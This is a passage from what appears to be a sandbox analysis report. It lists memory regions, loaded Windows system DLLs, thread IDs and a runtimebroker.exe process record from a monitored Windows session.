Region: id = 4806 start_va = 0x518dc70000 end_va = 0x518dc7ffff entry_point = 0x518dc70000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4807 start_va = 0x518dc80000 end_va = 0x518dc8ffff entry_point = 0x518dc80000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4808 start_va = 0x518dc90000 end_va = 0x518dc9ffff entry_point = 0x518dc90000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4809 start_va = 0x518dca0000 end_va = 0x518dcaffff entry_point = 0x518dca0000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4810 start_va = 0x518dcb0000 end_va = 0x518dcbffff entry_point = 0x518dcb0000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4811 start_va = 0x518dcc0000 end_va = 0x518dccffff entry_point = 0x518dcc0000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4812 start_va = 0x518dcd0000 end_va = 0x518dcd7fff entry_point = 0x0 region_type = private name = "private_0x000000518dcd0000" filename = "" Region: id = 4813 start_va = 0x518dce0000 end_va = 0x518dddffff entry_point = 0x0 region_type = private name = "private_0x000000518dce0000" filename = "" Region: id = 4814 start_va = 0x518dde0000 end_va = 0x518ddeffff entry_point = 0x518dde0000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4815 start_va = 0x518ddf0000 end_va = 0x518ddfffff entry_point = 0x518ddf0000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4816 start_va = 0x518de00000 end_va = 0x518de0ffff entry_point = 0x518de00000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4817 start_va = 0x518de10000 end_va = 0x518de1ffff entry_point = 0x518de10000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4818 start_va = 0x518de20000 end_va = 0x518de2ffff entry_point = 0x518de20000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4819 start_va = 0x518de30000 end_va = 0x518de3ffff entry_point = 0x518de30000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4820 start_va = 0x518de40000 end_va = 0x518de4ffff entry_point = 0x518de40000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4821 start_va = 0x518de50000 end_va = 0x518de5ffff entry_point = 0x518de50000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4822 start_va = 0x518de60000 end_va = 0x518de6ffff entry_point = 0x518de60000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4823 start_va = 0x518de70000 end_va = 0x518de7ffff entry_point = 0x518de70000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4824 start_va = 0x518de80000 end_va = 0x518de8ffff entry_point = 0x518de80000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4825 start_va = 0x518de90000 end_va = 0x518de9ffff entry_point = 0x518de90000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4826 start_va = 0x518deb0000 end_va = 0x518debffff entry_point = 0x518deb0000 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 4827 start_va = 0x7df5ff7a0000 end_va = 0x7ff5ff79ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff7a0000" filename = "" Region: id = 4828 start_va = 0x7ff682326000 end_va = 0x7ff682327fff entry_point = 0x0 region_type = private name = "private_0x00007ff682326000" filename = "" Region: id = 4829 start_va = 0x7ff682328000 end_va = 0x7ff682329fff entry_point = 0x0 region_type = private name = "private_0x00007ff682328000" filename = "" Region: id = 4830 start_va = 0x7ff68232c000 end_va = 0x7ff68232dfff entry_point = 0x0 region_type = private name = "private_0x00007ff68232c000" filename = "" Region: id = 4831 start_va = 0x7ff68232e000 end_va = 0x7ff68232ffff entry_point = 0x0 region_type = private name = "private_0x00007ff68232e000" filename = "" Region: id = 4832 start_va = 0x7ff682330000 end_va = 0x7ff68242ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff682330000" filename = "" Region: id = 4833 start_va = 0x7ff682430000 end_va = 0x7ff682452fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff682430000" filename = "" Region: id = 4834 start_va = 0x7ff682453000 end_va = 0x7ff682454fff entry_point = 0x0 region_type = private name = "private_0x00007ff682453000" filename = "" Region: id = 4835 start_va = 0x7ff682455000 end_va = 0x7ff682456fff entry_point = 0x0 region_type = private name = "private_0x00007ff682455000" filename = "" Region: id = 4836 start_va = 0x7ff682457000 end_va = 0x7ff682458fff entry_point = 0x0 region_type = private name = "private_0x00007ff682457000" filename = "" Region: id = 4837 start_va = 0x7ff682459000 end_va = 0x7ff68245afff entry_point = 0x0 region_type = private name = "private_0x00007ff682459000" filename = "" Region: id = 4838 start_va = 0x7ff68245b000 end_va = 0x7ff68245cfff entry_point = 0x0 region_type = private name = "private_0x00007ff68245b000" filename = "" Region: id = 4839 start_va = 0x7ff68245d000 end_va = 0x7ff68245efff entry_point = 0x0 region_type = private name = "private_0x00007ff68245d000" filename = "" Region: id = 4840 start_va = 0x7ff68245f000 end_va = 0x7ff68245ffff entry_point = 0x0 region_type = private name = "private_0x00007ff68245f000" filename = "" Region: id = 4841 start_va = 0x7ff683440000 end_va = 0x7ff683458fff entry_point = 0x7ff683440000 region_type = mapped_file name = "taskhostw.exe" filename = "\\Windows\\System32\\taskhostw.exe" (normalized: "c:\\windows\\system32\\taskhostw.exe") Region: id = 4842 start_va = 0x7ffae58e0000 end_va = 0x7ffae590bfff entry_point = 0x7ffae58e0000 region_type = mapped_file name = "winmmbase.dll" filename = "\\Windows\\System32\\winmmbase.dll" (normalized: "c:\\windows\\system32\\winmmbase.dll") Region: id = 4843 start_va = 0x7ffae5910000 end_va = 0x7ffae5932fff entry_point = 0x7ffae5910000 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 4844 start_va = 0x7ffae8190000 end_va = 0x7ffae81a4fff entry_point = 0x7ffae8190000 region_type = mapped_file name = "profext.dll" filename = "\\Windows\\System32\\profext.dll" (normalized: "c:\\windows\\system32\\profext.dll") Region: id = 4845 start_va = 0x7ffae8920000 end_va = 0x7ffae8998fff entry_point = 0x7ffae8920000 region_type = mapped_file name = "msutb.dll" filename = "\\Windows\\System32\\msutb.dll" (normalized: "c:\\windows\\system32\\msutb.dll") Region: id = 4846 start_va = 0x7ffae89a0000 end_va = 0x7ffae89abfff entry_point = 0x7ffae89a0000 region_type = mapped_file name = "msctfmonitor.dll" filename = "\\Windows\\System32\\MsCtfMonitor.dll" (normalized: "c:\\windows\\system32\\msctfmonitor.dll") Region: id = 4847 start_va = 0x7ffae89b0000 end_va = 0x7ffae89cafff entry_point = 0x7ffae89b0000 region_type = mapped_file name = "playsndsrv.dll" filename = "\\Windows\\System32\\PlaySndSrv.dll" (normalized: "c:\\windows\\system32\\playsndsrv.dll") Region: id = 4848 start_va = 0x7ffaeb090000 end_va = 0x7ffaeb371fff entry_point = 0x7ffaeb090000 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 4849 start_va = 0x7ffaeb700000 end_va = 0x7ffaeb9a6fff entry_point = 0x7ffaeb700000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 4850 start_va = 0x7ffaedb10000 end_va = 0x7ffaede85fff entry_point = 0x7ffaedb10000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 4851 start_va = 0x7ffaf24b0000 end_va = 0x7ffaf24d1fff entry_point = 0x7ffaf24b0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 4852 start_va = 0x7ffaf2a00000 end_va = 0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 4853 start_va = 0x7ffaf2d10000 end_va = 0x7ffaf2da5fff entry_point = 0x7ffaf2d10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4854 start_va = 0x7ffaf2db0000 end_va = 0x7ffaf2dd6fff entry_point = 0x7ffaf2db0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 4855 start_va = 0x7ffaf35e0000 end_va = 0x7ffaf3637fff entry_point = 0x7ffaf35e0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 4856 start_va = 0x7ffaf37e0000 end_va = 0x7ffaf3811fff entry_point = 0x7ffaf37e0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 4857 start_va = 0x7ffaf3a50000 end_va = 0x7ffaf3a6efff entry_point = 0x7ffaf3a50000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 4858 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4859 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4860 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4861 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4862 start_va = 0x7ffaf4540000 end_va = 0x7ffaf4583fff entry_point = 0x7ffaf4540000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 4863 start_va = 0x7ffaf4590000 end_va = 0x7ffaf4bb7fff entry_point = 0x7ffaf4590000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4864 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4865 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4866 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4867 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4868 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4869 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4870 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4871 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4872 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4873 start_va = 0x7ffaf5990000 end_va = 0x7ffaf6eb4fff entry_point = 0x7ffaf5990000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4874 start_va = 0x7ffaf6ec0000 end_va = 0x7ffaf6f64fff entry_point = 0x7ffaf6ec0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4875 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4876 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4877 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4878 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 4879 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4880 start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 4881 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 601 os_tid = 0x2f8 Thread: id = 602 os_tid = 0xa6c Thread: id = 603 os_tid = 0xa60 Thread: id = 604 os_tid = 0x9c0 Thread: id = 605 os_tid = 0x98c Thread: id = 606 os_tid = 0x988 Thread: id = 607 os_tid = 0x980 Thread: id = 608 os_tid = 0x97c Thread: id = 609 os_tid = 0x40c Thread: id = 610 os_tid = 0x7d4 Process: id = "55" image_name = "runtimebroker.exe" filename = "c:\\windows\\system32\\runtimebroker.exe" page_root = "0x9054000" os_pid = "0x698" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "40" os_parent_pid = "0x240" cmd_line = "C:\\Windows\\System32\\RuntimeBroker.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4882 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4883 start_va = 0x5e8cc60000 end_va = 0x5e8cc6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005e8cc60000" filename = "" Region: id = 4884 start_va = 0x5e8cc70000 end_va = 0x5e8cc70fff entry_point = 0x0 region_type = private name = "private_0x0000005e8cc70000" filename = "" Region: id = 4885 start_va = 0x5e8cc80000 end_va = 0x5e8cc93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005e8cc80000" filename = "" Region: id = 4886 start_va = 0x5e8cca0000 end_va = 0x5e8cd1ffff entry_point = 0x0 region_type = private name = "private_0x0000005e8cca0000" filename = "" Region: id = 4887 start_va = 0x5e8cd20000 end_va = 0x5e8cd23fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005e8cd20000" filename = "" Region: id = 4888 start_va = 0x5e8cd30000 end_va = 0x5e8cd31fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005e8cd30000" filename = "" Region: id = 4889 start_va = 0x5e8cd40000 end_va = 0x5e8cd41fff entry_point = 0x0 region_type = private name = "private_0x0000005e8cd40000" filename = "" Region: id = 4890 start_va = 0x5e8cdd0000 end_va = 0x5e8cdd0fff entry_point = 0x0 region_type = private name = "private_0x0000005e8cdd0000" filename = "" Region: id = 4891 start_va = 0x5e8cde0000 end_va = 0x5e8cde0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005e8cde0000" filename = "" Region: id = 4892 start_va = 0x5e8cdf0000 end_va = 0x5e8cdf6fff entry_point = 0x0 region_type = private name = "private_0x0000005e8cdf0000" filename = "" Region: id = 4893 start_va = 0x5e8ce00000 end_va = 0x5e8cefffff entry_point = 0x0 region_type = private name = "private_0x0000005e8ce00000" filename = "" Region: id = 4894 start_va = 0x5e8cf00000 end_va = 0x5e8cfbdfff entry_point = 0x5e8cf00000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4895 start_va = 0x5e8cfc0000 end_va = 0x5e8d03ffff entry_point = 0x0 region_type = private name = "private_0x0000005e8cfc0000" filename = "" Region: id = 4896 start_va = 0x5e8d0c0000 end_va = 0x5e8d0c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005e8d0c0000" filename = "" Region: id = 4897 start_va = 0x5e8d0d0000 end_va = 0x5e8d0f9fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005e8d0d0000" filename = "" Region: id = 4898 start_va = 0x5e8d100000 end_va = 0x5e8d106fff entry_point = 0x0 region_type = private name = "private_0x0000005e8d100000" filename = "" Region: id = 4899 start_va = 0x5e8d110000 end_va = 0x5e8d18ffff entry_point = 0x0 region_type = private name = "private_0x0000005e8d110000" filename = "" Region: id = 4900 start_va = 0x5e8d190000 end_va = 0x5e8d192fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005e8d190000" filename = "" Region: id = 4901 start_va = 0x5e8d1a0000 end_va = 0x5e8d1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005e8d1a0000" filename = "" Region: id = 4902 start_va = 0x5e8d1b0000 end_va = 0x5e8d1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005e8d1b0000" filename = "" Region: id = 4903 start_va = 0x5e8d200000 end_va = 0x5e8d2fffff entry_point = 0x0 region_type = private name = "private_0x0000005e8d200000" filename = "" Region: id = 4904 start_va = 0x5e8d300000 end_va = 0x5e8d487fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005e8d300000" filename = "" Region: id = 4905 start_va = 0x5e8d490000 end_va = 0x5e8d610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005e8d490000" filename = "" Region: id = 4906 start_va = 0x5e8d620000 end_va = 0x5e8ea1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005e8d620000" filename = "" Region: id = 4907 start_va = 0x5e8ea20000 end_va = 0x5e8ed56fff entry_point = 0x5e8ea20000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4908 start_va = 0x5e8ee50000 end_va = 0x5e8ee56fff entry_point = 0x0 region_type = private name = "private_0x0000005e8ee50000" filename = "" Region: id = 4909 start_va = 0x5e8ef00000 end_va = 0x5e8effffff entry_point = 0x0 region_type = private name = "private_0x0000005e8ef00000" filename = "" Region: id = 4910 start_va = 0x5e8f080000 end_va = 0x5e8f17ffff entry_point = 0x0 region_type = private name = "private_0x0000005e8f080000" filename = "" Region: id = 4911 start_va = 0x5e8f180000 end_va = 0x5e8f1fffff entry_point = 0x0 region_type = private name = "private_0x0000005e8f180000" filename = "" Region: id = 4912 start_va = 0x7df5ffcb0000 end_va = 0x7ff5ffcaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffcb0000" filename = "" Region: id = 4913 start_va = 0x7ff606f7a000 end_va = 0x7ff606f7bfff entry_point = 0x0 region_type = private name = "private_0x00007ff606f7a000" filename = "" Region: id = 4914 start_va = 0x7ff606f80000 end_va = 0x7ff60707ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff606f80000" filename = "" Region: id = 4915 start_va = 0x7ff607080000 end_va = 0x7ff6070a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff607080000" filename = "" Region: id = 4916 start_va = 0x7ff6070a5000 end_va = 0x7ff6070a6fff entry_point = 0x0 region_type = private name = "private_0x00007ff6070a5000" filename = "" Region: id = 4917 start_va = 0x7ff6070a9000 end_va = 0x7ff6070aafff entry_point = 0x0 region_type = private name = "private_0x00007ff6070a9000" filename = "" Region: id = 4918 start_va = 0x7ff6070ab000 end_va = 0x7ff6070abfff entry_point = 0x0 region_type = private name = "private_0x00007ff6070ab000" filename = "" Region: id = 4919 start_va = 0x7ff6070ae000 end_va = 0x7ff6070affff entry_point = 0x0 region_type = private name = "private_0x00007ff6070ae000" filename = "" Region: id = 4920 start_va = 0x7ff607450000 end_va = 0x7ff607465fff entry_point = 0x7ff607450000 region_type = mapped_file name = "runtimebroker.exe" filename = "\\Windows\\System32\\RuntimeBroker.exe" (normalized: "c:\\windows\\system32\\runtimebroker.exe") Region: id = 4921 start_va = 0x7ff7a4d30000 end_va = 0x7ff7a5581fff entry_point = 0x7ff7a4d30000 region_type = mapped_file name = "ntoskrnl.exe" filename = "\\Windows\\System32\\ntoskrnl.exe" (normalized: "c:\\windows\\system32\\ntoskrnl.exe") Region: id = 4922 start_va = 0x7ffae4250000 end_va = 0x7ffae42e1fff entry_point = 0x7ffae4250000 region_type = mapped_file name = "windows.internal.shell.broker.dll" filename = "\\Windows\\System32\\Windows.Internal.Shell.Broker.dll" (normalized: "c:\\windows\\system32\\windows.internal.shell.broker.dll") Region: id = 4923 start_va = 0x7ffae8710000 end_va = 0x7ffae8752fff entry_point = 0x7ffae8710000 region_type = mapped_file name = "execmodelclient.dll" filename = "\\Windows\\System32\\ExecModelClient.dll" (normalized: "c:\\windows\\system32\\execmodelclient.dll") Region: id = 4924 start_va = 0x7ffae8b60000 end_va = 0x7ffae8fc9fff entry_point = 0x7ffae8b60000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 4925 start_va = 0x7ffaed950000 end_va = 0x7ffaedb06fff entry_point = 0x7ffaed950000 region_type = mapped_file name = "windows.ui.immersive.dll" filename = "\\Windows\\System32\\Windows.UI.Immersive.dll" (normalized: "c:\\windows\\system32\\windows.ui.immersive.dll") Region: id = 4926 start_va = 0x7ffaeef30000 end_va = 0x7ffaef03efff entry_point = 0x7ffaeef30000 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 4927 start_va = 0x7ffaf0f60000 end_va = 0x7ffaf0f77fff entry_point = 0x7ffaf0f60000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" 